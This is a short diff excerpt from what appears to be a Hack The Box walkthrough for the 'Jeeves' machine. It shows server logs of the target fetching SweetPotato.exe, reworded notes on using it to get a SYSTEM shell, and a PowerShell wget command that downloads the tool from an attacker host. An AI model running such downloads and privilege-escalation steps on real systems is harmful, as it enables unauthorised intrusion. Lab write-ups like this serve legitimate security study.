Rang3l2/HTB-Walkthroughs/Medium-Jeeves.md

 10.10.10.63 - - [23/Dec/2023 18:03:34] code 404, message File not found
 10.10.10.63 - - [23/Dec/2023 18:03:34] "GET /sweetpotato.exe HTTP/1.1" 404 -
 10.10.10.63 - - [23/Dec/2023 18:03:56] "GET /SweetPotato.exe HTTP/1.1" 200 -
 ```

-Once the binary had been downloaded the tester tested the exploit by running the "whoami" command with it which return the system account.
-The tester used the same process used previouly to get get a system shell.
+Once the binary had been downloaded the tester tested the exploit by running the "whoami" command, which returned the system account.
+The tester used this process to get a system shell.

 ```
 PS C:\users\public\music> wget "http://10.10.14.8:8080/SweetPotato.exe" -outfile "/users/public/music/sweetpotato.exe"